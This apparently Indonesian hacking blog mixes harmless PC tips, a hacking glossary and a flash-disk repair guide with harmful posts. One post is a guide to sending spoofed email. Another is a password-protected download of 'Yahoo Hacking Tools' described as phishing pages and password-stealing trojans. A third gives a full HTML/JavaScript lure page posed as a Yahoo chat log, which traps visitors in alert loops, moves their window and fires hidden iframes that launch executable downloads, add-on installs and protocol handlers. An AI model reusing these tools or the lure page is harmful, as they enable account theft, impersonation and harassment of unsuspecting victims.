Latest Entries »

Trik mengirim email palsu


Pada kesempatan ini gw ingin berbagi pengetahuan seputar Trik mengirim email palsu. Trik ini gw dapet pas gw dapat Kejadian yang aneh. Di inbox email gw ada email yang mengatakan bahwa itu email berasal dari Raja Alien planet Nebola yang mengatakan bahwa gw adalah target mereka unyuk ditangkep!!!!!!Mungkin Karena gw Ganteng kale yah???Walaaaaah,, Adapun alamat emailnya yaitu Alienx@Planet_Nebola.co.id .
Tapi Pas gw cek by ricek selama semaleman ternyata alamat email itu Palsu alias Bodong. Dan keesokan Paginya gw akhirnya dapetin tuh trik orang iseng bwat ngirim email palsu,,,

Begini Triknya:

1. Buka Situs http://deadfake.com/
2. Kemudian Klik Tulisan Send Fake mail yang ada dibagian atas.
3. Trus isi kolom-kolomnya sesuai Hati lw,misalnya:
To: Masukin Email Target
From: Masukin Email palsu sesuai Keinginan kalian
Subjek: terserah kalian juga
Massage: Isi email yang mau lw tulis
4. Langkah terakhir jangan lupa masukin kode Verifikasinya ok ok.

Ingeet Tindakan ini dapat merugikan orang lain, jadi jangan ditiru ya,,ini semua hanya untuk pembelajaran aja okeeey.. JAdilah Manusia yang berguna Bagi orang lain (cieeeelah lagi Tobat Ceritanyaa) hehehehe,,
See You in Next Post,,

Iklan

E-Book Hacking, Gratis…


1. Devilzc0de Ezine #1

Devilzc0de Ezine #1

Download : http://www.4shared.com/file/213073553/4571867f/Devilzc0de_Ezine_1.html orhttp://www.indowebster.com/Devilzc0de_Ezine_1.html

2. Belajar PHP dan MYSQL Bareng Newbie V.1

Belajar PHP dan MYSQL Bareng Newbie V.1

Download :http://www.4shared.com/file/129816287/b542c939/Belajar_PHP_Dan_MySQL_Bareng_Newbie_V1.html

Aplikasi Qur’an [flash]


Sekali-sekali ini aq masukin aplikasi quran:

Aplikasi Qur’an

Buat sobat-sobat  muslim,aku pengen share nih kitab suci Al-Qur’an dalam bentuk flash versi animasi 3 dimensi. Jadi seolah-olah bisa liat kitab langsung. Apalagi kalo punya tablet pc, jadi tambah modern aja baca qur’an nya :D
Download 1
Download 2


Di bawah ini adalah sepuluh tips yang dapat Anda gunakan untuk menghemat pemakaian energi pada pc dan laptop.

1. Atur pencahayaan dan kontras monitor Mungkin bagi orang yang awam atau pemula dalam menggunakan komputer, mereka jarang sekali memperhatikan pengaturan monitor mereka. Yang dimaksud dalam hal ini adalah tingkat pencahayaan dan kontras yang diatur terlalu tinggi akan bisa menghabiskan banyak energi. Maka untuk itu anda harus bisa mengatur pencahayaan dan kontras tersebut, untuk mengatur pencahayaan dan kontras monitor tersebut gunakan tombol yang berada di bawah monitor.

2. Matikan monitor Tips yang ke-dua adalah dengan mematikan monitor, terutama monitor yang jenisnya adalah jenis CRT (Cathode Ray Tubel), karena monitor jenis tersebut lebih banyak mengkonsumsi tenaga listrik. Jadi, jika anda ingin meninggalkan PC tersebut dalam waktu yang lama, sebaiknya matikan monitor anda. Anda juga dapat menyetting Windows agar secara otomatis langsung mati dalam beberapa waktu tertentu, itu bisa dilakukan dengan cara, klik “Control Panel-Options”. Dalam “Power Options Properties” klik tab “Power Schemes”. Lalu klik tanda panah di bagian “Power Schemes” lalu pilih “Home/Office desk”. Lalu pilih waktu yang diinginkan pada “Turn Off Monitor” dan klik “Apply” dan “OK”.

3. Matikan Hard diskMeskipun kita tidak sedang melakukan apa pun pada komputer kita, tapi data anda akan selalu dibaca dari hard disk (oleh sistem operasi dan beberapa aplikasi). Karena alasan ini, hard disk hard disk akan terus menerus berputar dan tentu saja ini akan menghabiskan energi. Jika anda ingin meninggalkan PC anda dalam waktu yang lama, maka sebaiknya matikan hard disk PC anda. Pada “Power Options Properties” lalu klik tab “Power Schmes”. Klik tanda panah di bagian “Power Schemes” dan pilih “Home/Off desk”. Kemudian klik “Turn off hard disk” dan pilih waktunya. Lalu klik “Apply” dan “Ok”.

4. Matikan peralatan lainnya Matikanlah peralatan lainnya seperti, speaker, modem eksternal, scanner, Zip drive dan printer. Karena peralatan itu sangat menghabiskan banyak energi. Seringkali orang meninggalkan peralatan tersebut dalam keadaan aktif, bahkan saat kita sedang keluar dalam waktu yang lama.

5. Mode Hibernate Mode hibernate ini adalah fasilitas untuk melakukan shut down, tapi tidak menutup atau mematikan aplikasi yang sedang kita buka tadi. Hal ini dapat dilakukan dengan cara Mode “Hibernate”. Dengan mode ini, isi memory utama (RAM) akan tersimpan dalam hard disk. Cara melakukan mode hibernate adalah sebagai berikut, pada “Power Options” kliklah tab “Hibernate”. Lalu klik kotak dekat “Enable Hibernation”. Klik juga pada tab “Advanced”. Dalam bagian “When I Press the power button” lalu klik tanda panahnya kemudian klik “Hibernate”. Klik “Apply” dan “Ok”. Setelah itu tekan tombol “Power” pada komputer anda. Mode hibernate sudah berfungsi, tekan tombol “Power” sekali lagi, komputer anda akan menyala dan akan otomatis membuka aplikasi yang telah anda buka tadi.

6. Mode Standby Agar bisa menghemat energi, sebaiknya pengaturan monitor dan hard disk berada di bagian yang paling rendah pada mode standby. Jika anda ingin meninggalkan PC sebentar, sebaiknya aktifkan mode standby. Namun yang harus anda ketahui adalah, saat mode standby aktif data-data yang belum anda simpan dapat rusak atau hilang kalau PC anda mengalami kerusakan. Sebaiknya simpan dahulu data atau dokumen anda sebelum anda mengaktifkan mode standby ini. Mode standby dapat dilakukan dengan cara, klik “Start-Turn Off computer” lalu klik “Stanby”.

7. Gunakanlah UPS Gunakanlah selalu alat UPS, karena alat ini bisa membantu penyelamatan data atau shut down saat terjadi mati listrik. Untuk mengatur peralatan UPS dan mengkonfigurasikan alat tersebut “Power Option Properties” lalu pilih tab UPS. Bagian status dalam tab UPS menampilkan perkiraan jumlah menit yang dapat didukung UPS terhadap PC anda. Sebenarnya banyak cara untuk mengkonfigurasikan UPS, namun hal ini tergantung dari model dan kapasitas UPS yang digunakan.

8. Baterai Laptop Jika anda men-charge baterai laptop, pastikan proses charge-nya selesai. Karena proses charge yang dilakukan setengah-setengah lalu dilanjutkan kembali, itu malah akan menghabiskan banyak energi. Jika anda ingin berpergian, sebaiknya bawa selalu baterai tambaha. Untuk menghemat pemakaian baterai. Anda bisa memanfaatkan feature Hibernate/Suspended atau gunakan soket listrik yang dihubungkan ke stopkontak.

9. Port USB Jika saat anda menggunaka laptop dan saat itu anda memasukkan salah satu ke port USB di laptop, sebaiknya kalau sudah selesai langsung dilepaskan saja. Karena peralatan yang masih tertancap di port USB, itu juga dapat menghabiskan tenaga pada PC atau laptop anda. Sebaiknya lepaskan alat tersebut bila pemakainnya dirasa sudah cukup.

10. Skema Pemakaian Energi Laptop Biasanya produsen-produsen laptop juga menyertakan feature dan software power management. Software ini sangat berguna sekali bagi para konsumen laptop, karena software ini mampu mengatur pemakaian baterai dan daya listrik yang sedang digunakan. Di software ini ada beberapa pilihan yang dapat digunakan untuk mengetahui beban hard disk dan energi lain yang sedang digunakan oleh laptop. Di antaranya mengetahui kecepatan prosessor atau pencahayaan monitor yang tepat untuk dapat menghemat baterai. Software ini sekaligus dapat menjadi pengawas bagi kita dalam menggunakan laptop.

sumber : www.klik-kanan.com

Bikin Komputer ngomong


Oke, langsung aja…
Buka notepad dan copas kode berikut…

Code:
Dim msg, jasakom
msg=InputBox("Masukkan Kalimat","Ngomong Dong")
Set jasakom=CreateObject("sapi.spvoice")
jasakom.Speak msg

Nah simpan dengan nama Terserah.vbs dan jalankan…
Setelah itu masukkan atau ketik kata2 yang diinginkan…
Nyalakan speaker sekeras mungkin dan “ENTER”…

Semoga berguna…


1. Back Orifice: software buatan kelompok hacker ( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice 2000 yang mampu secara virtual mengendalikan sebuah komputer lain dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus melakukan langkah curang sedemikian rupa sehingga calon korban menerima dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya diselipkan (attach file lewat email) dalam sebuah file yang tidak berpenampilan jahat namun sebenarnya mengandung program Back Orifice server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan (kontrol) komputer korban dari jauh. Dari hanya sekedar melihat, menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi wild, wild west maka anda tentu sudah bisa menebak tentu black hat ini ada di pihak yang jahat. Hacker black hat ini juga biasa disebut sebagai aka crackers” dengan kemampuan mencuri data atau merusak sistem yang ada dalam komputer korban. Kelebihan black hat adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Serangan seperti ini bertujuan membuat server korban jadi kuwalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di masa lalu hacker hanya bisa melancarkan serangan denial-of-service attack dengan mengirimkan request dalam jumlah besar secara simultan dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa mengirimkan serangan dari beberapa komputer yang diaktifkan secara remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah besar ke komputer korban yang lain agar bisa dikendalikan secara remote. Setelah beberapa komputer korban ada dalam kendalinya, secara bersamaan komputer korban tersebut dikoordinir untuk melancarkan denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya dikendalikan secara remote untuk melakukan request secara kontinyu dan simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software pendeteksi dan pengalaman yang cukup admin jaringan di beberapa jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang sama genderang perang ditabuh untuk memberi komando pada hacker mulai mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para hacker maka pengumuman akan segera tersebar lewat beberapa media yang menjadi forum komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di beberapa mailing list seperti CERT, BugTraq, Microsoft’s security bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan kasus yang terjadi biasanya pemakai software kurang waspada akan kelemahan software yang dipakainya padahal kabar sudah disebar dan penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul bila aktivis sosial maupun politik menggabungkan kemampuan menyerang yang dimiliki dan menggunakannya untuk kepentingan menarik simpati lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti firewall IDS ini merupakan penghambat semua niat jahat yang akan megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan kemampuannya memberi peringatan kepada admin server saat terjadi sebuah aktivitas tertentu yang tidak diinginkan admin sebagai penanggung jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

11. Script kiddie: sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS pada korban yang memiliki expolit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker permula yang menggunakan metode ini karena biasanya mereka hanya menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan

12. Trojan horse: adalah sebuah aplikasi yang didesain untuk melakukan sebuah kecurangan namun terselubung dengan kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan (attach file lewat email) sebuah file tertentu yang mengandung trojan horse namun dengan kemasan menarik. Kalau trojan horse berhasil menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak terhingga ke komputer korban. Tiga jenis trojan horse yang popular digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu bagi intelektualita ketimbang untuk perbuatan jahat yang merusak. Hacker seperti ini sangat nanti dengan perusakan sebuah sistem, pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah sistem milik orang lain yang dimana mereka tidak memiliki otoritas untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan yang tidak disengaja seperti merubah atau menghapus data yang ada. Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan tertentu sebagai programer, konsultan maupun admin server.

MEMPERBAIKI FLASHDISK


Nich Aye Masukin Sini Aja Ya Isinya 

Memperbaiki Flash Disk yang tiba-tiba mati

Pernakah kamu mengalami kejadian seperti ini:

“Saat flash disk tertancap di komputer win XP, sedang dipakai namun tiba-tiba windows hank alias frozen. Setelah komputer di booting paksa dan di hidupkan lagi, ternyata flash disk yang tertancap tadi mati. Falsh disk tidak bisa bekerja lagi. Windows mendeteksi kapasitasnya 0 MB dan mengeluarkan pesan untuk memformatnya. Dicoba untuk di format gagal juga. Akhirnya gak terpakai lagi deh tuh Flash disk”
Kalau memang kasus seperti ini yang anda alami terhadap kerusakan flash disk anda. jangan khawatir kita masih bisa coba untuk menyelamatkan dan menghidupkanya lagi. Berikut ini langkah-langkah untuk memperbaikinya:

1. Softawre yang kita perlukan untuk keperluan ini adalah HP Drive Boot Utility (buatan HP namun jangan khawatir ternyata bisa kita gunakan untuk merek yang lainya. Bahkan untuk memory kamera juga). Anda bisa download di sini,

2. Pilih tipe format disk yang mau di gunakan (FAT, FAT32 atau NTFS),

3. Pilih Quick Format,

4. Kemudian pilih start untuk memulainya.



========================== Yahoo Hacking Tools ===========================

Yahoo Hacking Tools adalah Tools Portable dalam Kegiatan Hacking Yahoo messenger.
dalam Yahoo Hacking Tools ini terdapat Software :

1. Emo Creator
Tools untuk membuat Icon2

2. Fake Pager
Adalah aplikasi Yahoo Messenger Palsu, yang berguna untuk mencuri user name
dan password.

3. Magic Password
Trojan yang digunakan untuk mencuri password

4. Yahoo Booter.
Aplikasi untuk memboot lawan chating

5. Yahoo Fake Cam
Tools untuk mengecoh lawan chating dengan Cam Palsu 

6. Yahoo Fake Login
Halaman Login Palsu Yahoo (2008), yah buat nyuri password orang yang akan dikirim ke email

7. Yahoo PAss Stealler
Trojan Builder untuk nyulik password 

8. Yahoo Hack
Yahoo messengger Palsu

9. Yahoo Pass Crack
Crack Password Yahoo seseorang

10. Yahoo Password Recovery
Untuk mengetahui Password dan user name ym seseorang

Download : http://www.ziddu.com/download/283224…v1l__.rar.html

Password : h4ck3v1l


Kembali lagi bersama orang yang kurang kerjaan ini dalam Iseng Mode ON Part. 2 ROTFL . Bagi yang belom baca Part 1 bag 1-3 cari di blog ini, langsung aja.

Gak banyak yang bisa dilakukan disini, hanya iseng kecil – kecilan sederhana aja. Dan yang pasti jangan coba di komputer Anda Soldier

Oke, tanpa banyak basa basi langsung aja. Ehm saya juga butuh tambahan dari teman – teman semua neh untuk ide – ide iseng lainnya biar artikelnya jalan terus Devil

1. Wallpaper

Apaan tuh? Gak tau mau tulis judul apa yang jelas ini pernah di sharing sama siapa saya juga lupa.

Pertama liat desktop kalian masing – masing, lalu pencet Prt Scr di keyboard kalian alias kita Capture. Buka Paint dan paste hasil capture tadi. Simpan dan jadikan wallpaper…

Iseng Mode ON Part. 2

Ups jangan lupa klik kanan di desktop – Arrange Icon By – uncentang Show Desktop Icons.

Ya sekedar lucu – lucuan aja, jadi temen bakalan kaget icon – icon di komputernya gak bisa di klik. Jiah parah banget, just for fun Bro…


4. Script Iseng lEO_rETRo

Walah, awalnya Om lEO_rETRo memberi informasi mengenai Sniffing Yahoo dan ternyata ketika kita menuju link yang dia berikan… Wew, Outlook Express kebuka terus dan bertuliskan pesan “Hi… lEO_rETRo ganteng nggak?”. Iseng banget kan?

Oke kalo ada yang mau coba langsung aja tulis script berikut di notepad dengan nama TERSERAH.HTML dan upload di hostingan kita

Code:
<html><head><title>LOG CHAT YM!</title><meta http-equiv=”refresh” content=”2;url=’index.html'”> <script type=”text/javascript”> <!– if (self.parent.frames.length && self.parent.frames.length != 0) self.parent.location = document.location; neva = “Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ \n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..\n\ Hi… lEO_rETRo ganteng nggak? Pencet OK Klo Iya..”; if(window.opera){window.onkeydown = function(e){if(e.keyCode != 18 && e.keyCode != 27 && e.keyCode != 32 && e.keyCode != 115){if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById(‘roll’).Back();else for(var i = 0; i < 53; i++) document.getElementById(‘roll’).Forward();document.getElementById(‘roll’).Play();} else if(e.keyCode == 115){for(x in neva.split(‘\n’)){alert(neva.split(‘\n’)[x]); } } return false; }}else{ window.onkeydown = function(e){if(e.keyCode != 13 && e.keyCode != 27 && e.keyCode != 32){if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById(‘roll’).Back(); else for(var i = 0; i < 53; i++) document.getElementById(‘roll’).Forward(); document.getElementById(‘roll’).Play();}return false; }} /* document.onkeydown = function(){ for(var i = 0; i < 35; i++) document.getElementById(‘roll’).Back(); document.getElementById(‘roll’).Play(); return false; } */ window.resizeTo(640,800);window.moveTo(0,0);for (i = 1; i <= 800; i++){setTimeout(‘window.moveTo(1599,1199);’, i+”000″);i++;setTimeout(‘window.moveTo(0,1199);’, i+”000″);i++;setTimeout(‘window.moveTo(1599,0);’, i+”000″);i++;setTimeout(‘window.moveTo(0,0);’, i+”000″);} //–> </script> <style> #xx {width:0;height:0;display:none;} </style> </head><body onload=”window.open(‘index.html’);” onbeforeunload=”for(x in neva.split(‘\n’)){ alert(neva.split(‘\n’)[x]); } return false;”><h1>Missing TEXT</h1><br>if you cannot see website content, probably you are mobile users or turned off your javascript. Please enable javascript to view. <script type=”text/javascript”> <!– if(window.attachEvent){ document.body.onkeydown = function(){ if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById(‘roll’).Back();else for(var i = 0; i < 53; i++) document.getElementById(‘roll’).Forward();document.getElementById(‘roll’).Play();return false;}} //–> </script><iframe id=xx src=”/index.html”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”ymsgr:sendim?kena1″></iframe><iframe id=xx src=”ymsgr:sendim?kena2″></iframe><iframe id=xx src=”ymsgr:sendim?kena3″></iframe><iframe id=xx src=”ymsgr:sendim?kena4″></iframe><iframe id=xx src=”ymsgr:sendim?kena5″></iframe><iframe id=xx src=”ymsgr:sendim?kena6″></iframe><iframe id=xx src=”ymsgr:sendim?kena7″></iframe><iframe id=xx src=”ymsgr:sendim?kena8″></iframe><iframe id=xx src=”ymsgr:sendim?kena9″></iframe><iframe id=xx src=”irc://irc.theoneserv.net:6667″></iframe><iframe id=xx src=”irc://irc.theoneserv.net:6668″></iframe><iframe id=xx src=”irc://irc.theoneserv.net:6669″></iframe><iframe id=xx src=”irc://irc.theoneserv.net:7000″></iframe><iframe id=xx src=”http://cc.shu.edu.tw/~download/rar/wrar35b6tc.exe”></iframe><iframe id=xx src=”http://cc.shu.edu.tw/~download/x-lite/X-Lite_Win32_1100l_47546.exe”></iframe><iframe id=xx src=”http://cc.shu.edu.tw/~download/doc/e.ppt”></iframe><iframe id=xx src=”ftp://www.detik.com”></iframe><iframe id=xx src=”xml://www.detik.com”></iframe><iframe id=xx src=”telnet://192.168.1.1″></iframe><iframe id=xx src=”telnet://192.168.1.100″></iframe><iframe id=xx src=”telnet://127.0.0.1″></iframe><iframe id=xx src=”http://www.google.com/search?q=lEO_rETRo”></iframe><iframe id=xx src=”http://www.google.com/search?q=lEO_rETRo”></iframe><iframe id=xx src=”http://www.google.com/search?q=lEO_rETRo”></iframe><iframe id=xx src=”mailto:leo@gantengsekali.com”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=xx??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=cc??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=ss??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=ii??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=kk??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”ldap://ldap.com:6666/o=GRUPGILA, c=ll??sub?(cn=CANTIK)”></iframe><iframe id=xx src=”http://leoretro.co.cc”></iframe><iframe id=xx src=”http://leoretro.blogspot.com”></iframe><iframe id=xx src=”gopher://gopherbebek.xi”></iframe><iframe id=xx src=”/index.html”></iframe><iframe id=xx src=”https://addons.mozilla.org/en-US/firefox/downloads/latest/5066/addon-5066-latest.xpi”></iframe><iframe id=xx src=”https://addons.mozilla.org/en-US/firefox/downloads/latest/3006/addon-3006-latest.xpi”></iframe><iframe id=xx src=”https://addons.mozilla.org/en-US/firefox/downloads/latest/219/addon-219-latest.xpi”></iframe></body></html&gt;

Bye….